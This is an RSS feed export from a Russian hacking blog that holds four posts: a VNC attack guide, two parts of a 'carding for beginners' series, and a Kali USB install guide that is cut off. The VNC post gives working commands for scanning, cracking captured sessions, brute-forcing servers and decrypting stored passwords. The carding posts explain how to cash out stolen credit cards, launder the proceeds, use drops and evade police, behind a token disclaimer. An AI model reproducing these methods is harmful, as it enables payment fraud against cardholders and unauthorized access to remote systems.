<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@hackeronline</title><generator>teletype.in</generator><description><![CDATA[@hackeronline]]></description><link>https://teletype.in/@hackeronline?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/hackeronline?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/hackeronline?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sat, 13 Jun 2026 23:59:24 GMT</pubDate><lastBuildDate>Sat, 13 Jun 2026 23:59:24 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@hackeronline/FC_b7ANLT</guid><link>https://teletype.in/@hackeronline/FC_b7ANLT?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/FC_b7ANLT?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Аудит безопасности VNCАудит безопасности VNC</title><pubDate>Wed, 10 Jun 2020 10:39:12 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/11/07/1107f3e0-b5f9-4580-8e6a-47d64ddea762.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/79/1e/791e532d-ee70-45d8-bf3d-58a1048f2a03.jpeg"></img>Поиск компьютеров с VNC
По умолчанию RFB использует диапазон TCP-портов с 5900 до 5906. Каждый порт представляет собой соответствующий экран X-сервера (порты с 5900 по 5906 ассоциированы с экранами с :0 по :6).]]></description><content:encoded><![CDATA[
  <p>Поиск компьютеров с VNC<br />По умолчанию RFB использует диапазон TCP-портов с 5900 до 5906. Каждый порт представляет собой соответствующий экран X-сервера (порты с 5900 по 5906 ассоциированы с экранами с :0 по :6).</p>
  <p><br />Java Viewer и HTTP VNC используют порт 5800.<br />Просмотрщик (клиент) VNC в режиме прослушивания (Listening mode) прослушивает порт 5500.<br />Для сканирования сети в поисках VNC серверов и клиентов в режиме прослушивания:<br />sudo nmap -p 5500,5800,5900-5906 --open СЕТЬ</p>
  <p>Например:<br />sudo nmap -p 5500,5800,5900-5906 --open 192.168.43.0/24</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/79/1e/791e532d-ee70-45d8-bf3d-58a1048f2a03.jpeg" width="816" />
  </figure>
  <p>Анализ VNC трафика<br />Сессии VNC могут быть записаны, например, во время атак человек-посередине.</p>
  <p>Для извлечения challenge и response VNC сессии можно использовать Ettercap:<br />ettercap -Tq -r ФАЙЛ.pcapng</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/a2/6c/a26c85ea-93a0-46d0-b51e-72b626afca4d.jpeg" width="621" />
  </figure>
  <p>С помощью фильтров Wireshark можно провести детальный анализ VNC сессии:<br />Чтобы показать только трафик VNC сессий:<br />vnc</p>
  <p>VNC challenge (вызов):<br />vnc.auth_challenge</p>
  <p>VNC response (ответ):<br />vnc.auth_response</p>
  <p>Результат попытки аутентификации на VNC сервере:<br />vnc.auth_result</p>
  <p>Вызов, ответ и результат попытки аутентификации на VNC сервере:<br />vnc.auth<em>challenge or vnc.auth</em>response or vnc.auth_result</p>
  <p>Имя компьютера с VNC сервером:<br />vnc.desktop_name</p>
  <p>Позиция кнопок мыши:<br />vnc.button_1_pos<br />vnc.button_2_pos<br />…………...<br />vnc.button_8_pos<br />Выбранный тип безопасности:<br />vnc.client_security_type</p>
  <p>Тип кодирования:<br />vnc.client_set_encodings_encoding_type</p>
  <p>Версия VNC протокола клиента:<br />Версия VNC протокола сервера:<br />vnc.server_proto_ver</p>
  <p>Ширина Framebuffer:<br />vnc.width<br />Клавиша:<br />vnc.key</p>
  <p>Нажатие клавиши:<br />vnc.key_down<br />Данные передаваемого видео в формате H.264:<br />vnc.h264_data</p>
  <p>Вырезанный текст:<br />vnc.client_cut_text</p>
  <p>Взлом VNC пароля<br />Можно использовать разные приёмы для взлома VNC пароля:<br />Взлом пароля VNC сессии<br />Расшифровка сохранённого пароля VNC сервера<br />Брут-форс пароля сервера VNC<br />Взлом пароля VNC сессии<br />Из захваченной VNC сессии нужно извлечь Authentication challenge и Authentication response. <br />Если вы не хотите разбираться с методом, описанным для Hashcat, то используйте программу VNCrack.<br />Установка VNCrack<br />Установка в Kali Linux</p>
  <p>wget <a href="http://www.phenoelit.org/vncrack/vncrack_s.gz" target="_blank">http://www.phenoelit.org/vncrack/vncrack_s.gz</a><br />gunzip vncrack<em>s.gz<br />chmod +x vncrack</em>s<br />./vncrack_s<br />Установка в BlackArch<br />sudo pacman -S vncrack<br />Установка в Widnows<br />Скачайте файл <a href="http://www.phenoelit.org/vncrack/x4.exe" target="_blank">http://www.phenoelit.org/vncrack/x4.exe</a> и запустите его в командной строке. <br />Для взлома с VNCrack достаточно указать вызов, ответ и файл словаря, например, взлом пароля из перехваченной VNC сессии содержащий вызов (-c 894443629f4a9675809cff5da2e84651) и ответ (-r 271d94eb610b5c42588dc53506419e6a), пароли для брут-форса берутся из словаря (-w passwords.txt):<br />vncrack -c 894443629f4a9675809cff5da2e84651 -r 271d94eb610b5c42588dc53506419e6a -w passwords.txt</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/58/fb/58fbedb2-f89c-4831-848c-3acb6aae1261.jpeg" width="1015" />
  </figure>
  <p>Брут-форс серверов VNC<br />Рассмотрим программы для брут-форса пароля серверов VNC.<br />Сервера VNC отклоняют подключения после нескольких неудачных попыток, поэтому брут-форс VNC нужно выполнять в один поток с большим интервалом между запросами.<br />patator это одна из самых универсальных и гибких в настройке программа для брут-форса.<br />В следующем примере время ожидания между запросами установлено на 61 секунду:<br />patator vnc_login host=192.168.43.250 password=FILE0 0=passwords.txt -t 1 -x quit:code=0 -x ignore:fgrep=&#x27;authentication rejected&#x27; -x ignore:fgrep=&#x27;Authentication failure&#x27; --rate-limit=61<br />Примеры ошибок, когда сервер отверг ваше подключение без проверки пароля:<br />Session setup failed: &quot;Your connection has been rejected.<br />password check failed!<br />Как можно увидеть на следующих скриншотах, несмотря на долгое время брут-форса и парочку сообщений об ошибках, пароли на двух серверах VNC всё таки были подобраны:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/d0/2c/d02c498e-6ac9-4a71-ac47-be033e6a3552.jpeg" width="1280" />
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/a4/c3/a4c3e980-b56f-47a3-867b-5543c1277b8b.jpeg" width="1187" />
  </figure>
  <p>Crowbar<br /> (ранее известный как Levye) — это инструмент для брут-форса, который может использоваться во время тестов на проникновение. Он создан для поддержки протоколов, которые в настоящее время не поддерживаются в THC-Hydra и другими популярными инструментами брут-форса.<br />Установка Crowbar<br />sudo apt install crowbar freerdp2-x11 openvpn nmap<br />Установка в BlackArch<br />sudo pacman -S crowbar freerdp openvpn nmap</p>
  <p>Пример брут-форса службы RDP на единичном хосте (-s 192.168.86.61/32) со словарём паролей (-C /root/words.txt) используя 1 поток (-n 1):<br />crowbar -b vnckey -s 192.168.86.61/32 -C /root/words.txt -n 1</p>
  <p>VNCrack<br />Об установке программы VNCrack сказано чуть выше.<br />Пример запуска брут-форса:<br />vncrack -h 192.168.43.250 -w passwords.txt</p>
  <p>Расшифровка хранимых VNC паролей<br />Сервер VNC хранит пароль на компьютере в закодированном виде. Имеется множество способов извлечь этот пароль. Рассмотрим программы и способы расшифровки сохранённого пароля VNC сервера.<br />VNCPassView<br />VNCPassView — это небольшая утилита для восстановления паролей, сохранённых инструментами VNC.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/a2/6c/a26c85ea-93a0-46d0-b51e-72b626afca4d.jpeg" width="621" />
  </figure>
  <p>Где Windows хранить VNC пароли<br />Пароли VNC в Windows хранятся в реестре в следующих ветках (список может быть неполным):<br />\HKEY<em>LOCAL</em>MACHINE\SOFTWARE\TigerVNC\WinVNC4<br />\HKEY_L<em>LOCAL</em>CHINE\SOFTWARE\TightVNC\Server<br />\HKEY_LOC<em>LOCAL</em>INE\SOFTWARE\ORL\WinVNC3\Default<br />\HKEY_LOCAL<em>LOCAL</em>E\SOFTWARE\RealVNC\WinVNC4\<br />\HKEY_CURRENT<em>CURRENT</em>tware\TightVNC<br />\HKEY<em>CURRENT</em>U<em>CURRENT</em>are\TurboVNC<br />\HKEY<em>CURRENT</em>USE<em>CURRENT</em>e\ORL\WinVNC3\Password<br />\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password<br />Пароль хранится в бинарном виде, его длина 8 байт.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/f2/fb/f2fb3a78-5533-484c-8146-dbc94de0ec73.jpeg" width="1170" />
  </figure>
  <p>Для чтения пароля из реестра можно воспользоваться командами для сохранения фрагментов реестра в файлы .reg, например:</p>
  <p>regedit.exe /E winvnc3.reg &quot;HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\&quot;<br />regedit.exe /E winvnc4.reg &quot;HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4\&quot;<br />Расшифровка пароля в VNCrack<br />С помощью VNCrack можно извлечь закодированный пароль, для этого запустите программу в интерактивном режиме:</p>
  <p>Затем введите байты пароль — два байта на строку, например так:<br />14<br />cc<br />ac<br />84<br />2f<br />6f<br />8d<br />0d</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/12/05/1205182a-0bd6-470e-95c4-308f788bd79c.jpeg" width="571" />
  </figure>
  <p>В результате будет выведена итоговая строка и закодированный пароль:</p>
  <p>Entered HEX String: 14 cc ac 84 2f 6f 8d d<br />VNC Password: 222222<br />Где Linux хранить VNC пароли<br />В Linux пароли могут храниться где угодно, но файлом по умолчанию является ~/.vnc/passwd. Для его просмотра откройте его любым редактором, способным отображать шестнадцатеричные данные:</p>
  <hr />
  <figure class="m_original">
    <img src="https://teletype.in/files/57/c5/57c5c6e0-aafb-4506-82ed-9205b4f01215.jpeg" width="966" />
  </figure>
  <p>Расшифровка пароля в Linux<br />В Linux также можно воспользоваться помощью VNCrack:<br />vncrack -C ~/.vnc/passwd</p>
  <p>Восстановление пароля VNC сервера, хранимого в файле ~/.vnc/passwd:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/33/0f/330f6914-78e9-45dc-9e5e-eb7525e2b55d.jpeg" width="488" />
  </figure>
  <p>Либо можете воспользоваться способом, который описал Bill Chaison: <a href="https://github.com/billchaison/VNCDecrypt" target="_blank">https://github.com/billchaison/VNCDecrypt</a>. Для этого достаточно запустить команду следующего вида:<br />echo -n БАЙТЫ_ПАРОЛЯ | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv<br />Например:<br />echo -n F0E43164F6C2E373 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/dd/15/dd15b8f1-8ca9-4e13-b603-fab51d5d3d0e.jpeg" width="817" />
  </figure>
  <p>Скрипты nmap для аудита VNC<br />Страница с перечнем NSE (скрипты Nmap): https://nmap.org/nsedoc/. На ней присутствуют следующие скрипты:<br />realvnc-auth-bypass<br />Проверяет, уязвим ли VNC-сервер к обходу аутентификации RealVNC (CVE-2006-2369).<br />vnc-brute<br />Выполняет брут-форс пароля VNC серверов.<br />vnc-info<br />Запрашивает у сервера VNC версию протокола и поддерживаемые типы безопасности.<br />Пытается войти на сервер VNC и получить имя его рабочего стола. Использует учетные данные, обнаруженные типами аутентификации vnc-brute или None. Если realvnc-auth-bypass был запущен и возвращен VULNERABLE, этот сценарий будет использовать эту уязвимость для обхода аутентификации.<br />Для запуска нужно использовать опцию --script, после которой можно указать скрипт, либо несколько скриптов через запятую:<br />sudo nmap -p 5500,5800,5900-5906 --script realvnc-auth-bypass,vnc-brute,vnc-info,vnc-title ХОСТ_ИЛИ_СЕТЬ</p>
  <p>Также можно задействовать все скрипты следующим образом:<br />sudo nmap -p 5500,5800,5900-5906 --script &#x27;vnc-*&#x27; ХОСТ<em>ИЛИ</em>СЕТЬ</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/sxGP-oNRw</guid><link>https://teletype.in/@hackeronline/sxGP-oNRw?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/sxGP-oNRw?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Кардинг для начинающих. Часть 2</title><pubDate>Fri, 05 Jun 2020 12:04:34 GMT</pubDate><description><![CDATA[Статья исключительно в ознакомительных целях и не призывает к действиям, нарушающим закон!]]></description><content:encoded><![CDATA[
  <p>Статья исключительно в ознакомительных целях и не призывает к действиям, нарушающим закон!</p>
  <hr />
  <p>Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги.<br />Но в итоге всё сводится к одному - извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc &gt; WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить кредитную карту в WM и поиметь много $??</p>
  <hr />
  <p>Способ № 0 - продажа<br />Самый элементарный способ – продажа кредитных карточек. Его можно даже назвать примером “cс to WM”. Ты даёшь кредитную карточку - тебе тут же перечисляют практически легальные деньги.<br />Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3. Очень небольшие деньги, если учесть, что на кредитной карте может лежать до нескольких тысяч долларов, которые ты в последствии сможешь тратить практически как заблагорассудится. Пусть не все, но какую-то часть тебе наверняка удастся извлечь. Как? Об этом я тебе сегодня расскажу.<br />Способ №1 – перевод<br />Давай посмотрим, как осуществить перевод денег «СС &gt; E-Gold &gt; WM». <br />Дело в том, что E-Gold деньги ты сможешь купить прямо с кредитной карты, а их уже без проблем можно перевести на WM, обменников сейчас в Сети очень много (их список можно найти), главное - выбрать подходящие тебе проценты. Конечно, здесь есть и сложности - у тебя могут попросить подтверждение по телефону, скан карты и документа, удостоверяющего личность. В этом случае, если ты не кардхолдер, деньги получить очень непросто.<br />Происходит всё так. Ты ищешь на вышеуказанном сайте обменники, которые принимают кредитные карточки. Вбиваешь креду, указывая, сколько денег тебе нужно перевести с твоей карты на аккаунт в системе E-Gold. Ждешь несколько часов или, иногда, дней. Затем, если все проходит успешно - открываешь свой e-gold-аккаунт и удивляешься лежащей там сумме. Но не всё так просто, как кажется. Кардхолдер (хозяин креды) обязательно сделает чардж–реверс (возврат денег), когда увидит, что проклятый кардер нагло спёр его честно заработанные деньги. Ребята из обменника отпишут в E-Gold – «помогите, нас ограбили». И твой E-Gold-аккаунт закроют вместе с деньгами. Так что очень важно успеть ещё эти деньги отмыть. Есть люди, которые этим занимаются – ты шлёшь им нелегальные деньги со своего аккаунта, а они отправляют тебе легальные WebMoney.<br />Ты можешь возразить: мол, можно найти обменник E-GOLD &gt; WM и быстренько самому обменять, чтобы не платить процент (и немалый) от ворованных денег обнальщику. Но имей в виду, что вскоре этот обменник – после того, как E-Gold заберёт у него деньги – свяжется еще и со службой поддержки WebMoney и потребует вернуть деньги. WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper. В общем, девиз любого кардера - “Хочешь жить, умей вертеться”.<br />Способ № 2 – отмыв через аукцион<br />Идём на интернет-аукцион и выкладываем там лот: &quot;Домен + хостинг за XX $ в год! Оплата по WM&quot;. Потом, когда появятся покупатели, начинаем покупать по чужим кредам домены и хостинг и продавать за XX $ покупателям с аукциона.<br />Казалось бы, всё просто. Но через некоторое время после продажи домены и хостинги… накроются. Почему? Да всё потому же - кардхолдер потребует вернуть украденные деньги, банк заберет деньги у ВорлдХостинга, который, в свою очередь, прикроет домены. Получается, что твои покупатели выбросили деньги на ветер, а ты стал кидалой. Не здорово, правда?<br />Способ №3 – партнерские программы<br />Для того, чтобы осуществить этот способ, нам придётся найти партнёрские программы, которые платят за клики или показы баннеров. Делаем сайт, где выкладываем эти самые баннеры и скрипты спонсоров, покупаем много-много трафика на сс. И - ждём свои WM.<br />Тут, думаю, всё шоколадно. Но контент твоего сайта должен быть солидным, чтобы не привлекать внимание службы поддержки партнёрских программ. Ведь они собираются тебе платить, и если твой сайт будет представлять собой кашу из невразумительного текста и подозрительного дизайна, а счётчики будут показывать тысячи посетителей ежедневно, то это вызовет справедливые подозрения. Что может привести к закрытию твоего акка.<br />Способ №4 – Задай себе вопрос за деньги<br />Наш путь лежит на сайты с платными ответами или заданиями. Для реализации этого способа надо взять кучу карт без кода, создать аккаунты и создавать себе задания из разных категорий. Каждый вопрос стоит определённую сумму (её ты требуешь сам). За 2-3 задания в день вполне может набежать 10-20 долларов, и так – постоянно. При выводе придётся попросить выслать чек, а при обнале - попросить перевести на WM. Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц. Сайты можно менять.<br />Способ №5 – Поторгуйся сам с собой<br />Что нам мешает покупать домены на cc и продавать их уже за WM? Существует много сайтов, где продают готовые проекты или солидные эксклюзивные шаблоны для сайтов. Их тоже можно покупать на сс и продавать через выгодную тебе платёжную систему.<br />Торговать с самим собой можно и другим способом. К примеру, сделать РЕАЛЬНЫЙ сайт по продаже какого-нибудь сервиса или софта. Сайт должен быть именно реальный, чтобы мерчант мог это проверить и ничего не заподозрить. Затем – регистрируем аккаунт у мерчанта, ставим невысокую цену, устанавливаем всё у себя на сайте. Осталось только раскрутить сайт, купить трафик за СС, и, когда у тебя наберётся достаточно посещений, можно начинать покупать у самого себя, только в разумных пределах и анонимно, опять же - мерчант не должен ничего заподозрить. Таким образом можно сделать пару сайтов и потихоньку работать. Главное - не переборщить и знать меру. Потом, естественно, получить сокровенные WM, если мерчант позволяет такую услугу, или, получив чек, перевести его во всё те же WM.<br />Способ №6 – Задорно, но не порно?<br />Главное здесь – найти через какой-нибудь поисковик (например, google.com) Adult-спонсоров, которые предоставляют уже готовый магазин (к примеру, www.sextoyfun.com).<br />Эти спонсоры дают тебе процент с продаж с твоего (точнее, предоставленного тебе) сайта и платят за привлечение рефералов. Остаётся только прикинуться порно маньяком - вбить карты на своем шопе. Потом, уже в роли порно продавца, заказать чек через Western Express на WebMoney (если спонсор не работает сразу через WM).<br />У этого способа есть неоспоримый плюс – не надо ничего делать. Ни тебе сайтов, ни подключения к биллингам. Но есть и минус - обычно дают не больше 25% с продажи.</p>
  <hr />
  <p>Заключение<br />Я описал далеко не все способы обналички денег с кредиток. А вот заниматься кардингом или нет - это дело лично каждого. Могу лишь посоветовать не быть назойливым, иметь терпение, читать умные книжки и, разумеется статьи.</p>
  <hr />
  <p>Статья исключительно в ознакомительных целях и не призывает к действиям, нарушающим закон</p>
  <hr />
  <p data-align="center"><strong>t.me/lockdarknet</strong></p>
  <hr />

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/cDd6ZgOx5</guid><link>https://teletype.in/@hackeronline/cDd6ZgOx5?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/cDd6ZgOx5?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Кардинг для начинающих. Часть 1</title><pubDate>Fri, 05 Jun 2020 12:00:11 GMT</pubDate><description><![CDATA[Статья исключительно в ознакомительных целях и не призывает к действиям, нарушающим закон!]]></description><content:encoded><![CDATA[
  <p>Статья исключительно в ознакомительных целях и не призывает к действиям, нарушающим закон!</p>
  <hr />
  <p>Информация в данной статье исключительно для новичков</p>
  <hr />
  <p>Кардинг- высокоинтеллектуальный гоп-стоп. <br />Методика отъёма денег у пользователей раскрашенного пластика.<br />На просторах интернета широко шагает рука об руку с хакингом, скамингом и фишингом. Преследуется по закону.<br />Словарик кардера</p>
  <ul>
    <li>ATM (automatic teller machine) - банкомат. Жаргонное — бабломёт.</li>
    <li>сс, картон (credit card) - кредитная карта.</li>
    <li>Вбивальщик картона - человек, который занимается оформлением покупок по ворованным кредиткам в электронных магазинах. А это действительно не такое уж и простое дело. Чтобы не попалили, нужно сидеть под американской версией Винды, покупки совершать в определенное время, лазить через пиндосскую проксю (чем ближе от владельца карты, тем лучше) и т. п. важные мелочи.</li>
    <li>Трек (track) - данные магнитной полосы. Кроме номера карты содержит служебную информацию, без которой электронное использование карты (в терминалах) приводит к фейлу.</li>
    <li>ДП (dump + pin) - трек + ПИН.</li>
    <li>Дроп (drop) - подставное лицо, на которое приходит товар, заказанный в электронном магазине на ворованную кредитку. Чаще всего это нигры либо нищебродствующие иммигранты. Реже - наивные домохозяйки.</li>
    <li>Кардхолдер (card-holder) - настоящий держатель карты. Владелец карты всегда банк.</li>
    <li>Чарджбэк (money back) - процедура отзыва денег назад в том случае, если владелец карты заметил неладное.</li>
    <li>Рипер - кардер-кидала, который не гнушается дурить своих же коллег по преступному бизнесу.</li>
  </ul>
  <hr />
  <p>Основные заблуждения.<br />1. Хочу все и сразу.<br />Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь всё есть.<br />2. Безопасность. Меня посадят.<br />Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнёт зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, при чём используешь не сокс, а именно дедик, который имеет наибольшую анонимность.<br />Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, <br />ВПН - это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.<br />3. Лёгкие деньги.<br />Возможно, ты уже знаешь, что все продавцы дампа+пина - это всё лохотрон. <br />А если нет, то предупреждаю, деньги за деньги никто не продаёт, чудеса возможны только в стране дураков.</p>
  <hr />
  <p>Куда можно вбить и как на этом заработать.<br />1. Шопы.<br />Плюсы:относительно легко найти шлющий шоп. <br />Минусы: шопы быстро помирают, маленький % чистого дохода от вбива.<br />2. Свой мерчант счет.<br />Плюсы: доход от вбива до 95%. <br />Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом.<br />3. Брокерские конторы, типа форекс и биржи.<br />Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счёт на дропа с такими же именем и фамилией, как у холдера и слить все деньги на дропа.<br />4. Покер аккаунты и конторы со ставками на спорт.<br />Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. .<br />5. Мобильные операторы.<br />Скажу сразу, что в СНГ операторов вбить не получится, не спорю, такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.<br />6. Онлайн игры.<br />На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счёт игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пэйпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.<br />7. Платежные системы.<br />Не стоит вбивать в пэйпел, хотя бы потому, что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы(скрил), эта платёжка больше себя позиционирует для оплаты товаров и услуг, нежели для расчётов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.<br />8. Остальное.<br />Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. <br />Вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.</p>
  <hr />
  <p>Когда человек, далёкий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. всё упирается в лимиты.<br />Деньги с СС можно перевести на счёт казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрёт на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе всё накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.<br />Забегая вперёд, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдёргивают логи с банковскими аккуантами и сливают на своих дропов, а всё то, что продают- это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идёт транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.<br />Теперь спустимся на более реальную землю, заливы- это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десятков долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место- вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп- это по сути одна тема по сливу, если задрочить помрёт также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый-это отсев, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлёт ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берём не по верхней планке. 600$ - усреднённая стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.</p>
  <hr />
  <p data-align="center"><strong>Продолжение следует</strong></p>
  <hr />

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hackeronline/1IT1O4wgY</guid><link>https://teletype.in/@hackeronline/1IT1O4wgY?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline</link><comments>https://teletype.in/@hackeronline/1IT1O4wgY?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hackeronline#comments</comments><dc:creator>hackeronline</dc:creator><title>Устанавливаем Kali Linux на флешку</title><pubDate>Thu, 04 Jun 2020 22:34:25 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b1/7c/b17c723d-de67-4a8e-93ec-8f9cb5c9df00.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/75/5a/755a2f40-0909-4c3d-8215-cecc2e088fb3.jpeg"></img>Всем привет. Сейчас я вам расскажу, как устанавливать кали линукс на флешку, как полноценную OC.
Мы все знаем, что при загрузки с флешки с кали линуксом нам дается выбор.]]></description><content:encoded><![CDATA[
  <p>Всем привет. Сейчас я вам расскажу, как устанавливать кали линукс на флешку, как полноценную OC.<br />Мы все знаем, что при загрузки с флешки с кали линуксом нам дается выбор.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/75/5a/755a2f40-0909-4c3d-8215-cecc2e088fb3.jpeg" width="1200" />
  </figure>
  <p>Так вот при загрузке с лайв режима у нас запустится кали линукс со всеми возможностями, но есть одна проблемка,<br />после перезагрузки все данные не сохраняются, то есть если вы создадите папку то после перезагрузки ее не станет<br />ну а что бы этого не произошло нужно сделать некоторые действия.<br />НУ ЧТО? ПОЕХАЛИ!<br />первым делом мы скачиваем кали линукс с официального сайта <a href="https://www.kali.org/downloads/" target="_blank">https://www.kali.org/downloads/</a></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/c6/ab/c6ab21ae-2a33-4640-8e3b-632ff48247e5.jpeg" width="975" />
  </figure>
  <p>Если у вас 64 битная система то скачиваем с 1 варианта. Если у вас 32 битная система то 2 вариант. Сделали? Тогда идем дальше. Дальше нужно скачать Rufus, для этого переходим по этой ссылке <a href="https://rufus.ie/ru_RU.html" target="_blank">https://rufus.ie/ru_RU.html</a></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/23/2c/232c948d-fd5c-4c41-acf3-c6177c426f02.jpeg" width="1028" />
  </figure>
